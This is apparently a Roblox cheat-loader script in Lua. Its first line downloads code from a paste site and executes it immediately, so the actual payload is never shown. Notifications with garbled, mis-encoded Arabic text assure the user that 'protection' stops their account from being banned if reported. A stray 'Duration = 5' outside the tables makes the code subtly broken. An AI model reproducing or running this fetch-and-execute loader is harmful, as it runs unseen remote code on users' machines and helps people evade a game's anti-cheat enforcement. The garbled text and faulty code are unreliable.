loadstring(game:HttpGet("https://pastefy.app/ZLUCe86o/raw"))()

wait(1)

game:GetService("StarterGui"):SetCore("SendNotification", { 
	Title = "ูุง ุชุฎุงู ููุง ุชููู";
	Text = "ุงุฐุง ุดุฎุต ุชู ุงุจูุงุบ ุนููู ูู ููุญุธุฑ ุญุณุงุจู ูุงู ููุฌุฏ ุญูุงูุฉ ูููุฉ ! ๐";
	Icon = "http://www.roblox.com/asset/?id=15705773225"})
Duration = 5;

wait(1)

game:GetService("StarterGui"):SetCore("SendNotification", { 
	Title = "ุงุฐุง ูุงุฌูุช ุดุงุดุฉ ุณูุฏุงุก";
	Text = "ูุฐุง ูุนูู ูุดู ุชุดุบูู ุญูุงูุฉ... ๐";
	Icon = "http://www.roblox.com/asset/?id=764055032"})
Duration = 5;

-- ููุด ุงูุช ููุงุ . ุฑุฌุงุก ูุง ุชุณุฑู ุณูุฑุจุช ๐๐ป .
